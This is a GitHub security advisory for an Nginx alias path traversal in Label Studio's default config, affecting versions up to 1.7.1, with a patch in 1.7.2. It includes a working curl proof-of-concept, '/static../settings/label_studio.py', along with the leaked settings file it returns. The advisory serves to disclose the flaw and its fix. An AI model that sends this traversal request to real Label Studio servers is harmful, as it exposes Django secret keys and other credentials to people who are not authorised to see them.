Skip to content

Nginx alias path traversal allows unauthenticated attackers to read all files on /label_studio/core/

High severity GitHub Reviewed Published Mar 24, 2023 in HumanSignal/label-studio • Updated Nov 8, 2023

Package

pip label-studio (pip)

Affected versions

<= 1.7.1

Patched versions

1.7.2

Description

Summary

The vulnerability resides on the Nginx config file:
https://github.com/heartexlabs/label-studio/blob/53944e6bcede75ca5c102d655013f2e5238e85e6/deploy/default.conf#L119

The pattern on location /static indicates a popular misconfiguration on Nginx servers presented in 2018 originally by Orange Tsai. This vulnerability allows an attacker to use a single path traversal payload in the matched location to traverse one directory above. This vulnerability only happens due to the location /static directive not having a slash / at the end, the following code shows an example of a safe configuration:

location /static/ {
[...]

The vulnerability works because Nginx will think that /static../ is a directory that should also be aliased to the folder, allowing /static/../ to be reached. In Label Studio's case, this means all files on /label_studio/core/ are exposed.

Of course, this means that only Label Studio instances that were deployed using the default nginx files introducted at Mar 31, 2021.
This is a very easy vulnerability to fix, and just a lesser-known configuration mistake on nginx files. It's very easy to happen because all is needed is for one slash to be missing. (Off-By-One)

** Proof-of-Concept (Leaking Secret Keys): **
Exploiting this vulnerability usually depends on what's on the parent folder, in Label Studio's case the most interesting file I could find that's on there by default is /label_studio/core/ . We can fetch it by simply making a request to the traversed folder.

# Production Label Studio docker-compose running on localhost:8080
/t/mydata [127]$ curl localhost:8080/static../settings/label_studio.py
"""This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import os
import pathlib

from core.settings.base import *

DJANGO_DB = get_env('DJANGO_DB', DJANGO_DB_SQLITE)
DATABASES = {'default': DATABASES_ALL[DJANGO_DB]}

MIDDLEWARE.append('organizations.middleware.DummyGetSessionMiddleware')
MIDDLEWARE.append('core.middleware.UpdateLastActivityMiddleware')
if INACTIVITY_SESSION_TIMEOUT_ENABLED:
    MIDDLEWARE.append('core.middleware.InactivitySessionTimeoutMiddleWare')

ADD_DEFAULT_ML_BACKENDS = False

LOGGING['root']['level'] = get_env('LOG_LEVEL', 'WARNING')

DEBUG = get_bool_env('DEBUG', False)

DEBUG_PROPAGATE_EXCEPTIONS = get_bool_env('DEBUG_PROPAGATE_EXCEPTIONS', False)

SESSION_COOKIE_SECURE = False

SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"

RQ_QUEUES = {}

SENTRY_DSN = get_env(
    'SENTRY_DSN',
    'https://[email protected]/5820521'
)
SENTRY_ENVIRONMENT = get_env('SENTRY_ENVIRONMENT', 'opensource')

FRONTEND_SENTRY_DSN = get_env(
    'FRONTEND_SENTRY_DSN',
    'https://[email protected]/5838868')
FRONTEND_SENTRY_ENVIRONMENT = get_env('FRONTEND_SENTRY_ENVIRONMENT', 'opensource')

EDITOR_KEYMAP = json.dumps(get_env("EDITOR_KEYMAP"))

from label_studio import __version__
from label_studio.core.utils import sentry
sentry.init_sentry(release_name='label-studio', release_version=__version__)

# we should do it after sentry init
from label_studio.core.utils.common import collect_versions
versions = collect_versions()

# in Label Studio Community version, feature flags are always ON
FEATURE_FLAGS_DEFAULT_VALUE = True
# or if file is not set, default is using offline mode
FEATURE_FLAGS_OFFLINE = get_bool_env('FEATURE_FLAGS_OFFLINE', True)

from core.utils.io import find_file
FEATURE_FLAGS_FILE = get_env('FEATURE_FLAGS_FILE', 'feature_flags.json')
FEATURE_FLAGS_FROM_FILE = True
try:
    from core.utils.io import find_node
    find_node('label_studio', FEATURE_FLAGS_FILE, 'file')
except IOError:
    FEATURE_FLAGS_FROM_FILE = False

STORAGE_PERSISTENCE = get_bool_env('STORAGE_PERSISTENCE', True)

Impact

The impact consists on leaking Django secret keys by default, with also greater risk being possible due to the vulnerability exposing the file located at /label_studio/core/settings/label_studio.py which contains the secret key for Django as well as possibly containing other secrets the user might put there. (If the administrator decides not to use environment variables for some variables)

References

@farioas farioas published to HumanSignal/label-studio Mar 24, 2023
Published to the GitHub Advisory Database Mar 24, 2023
Reviewed Mar 24, 2023
Last updated Nov 8, 2023

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Weaknesses

No CWEs

CVE ID

No known CVE

GHSA ID

GHSA-cpmr-mw4j-99r7

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.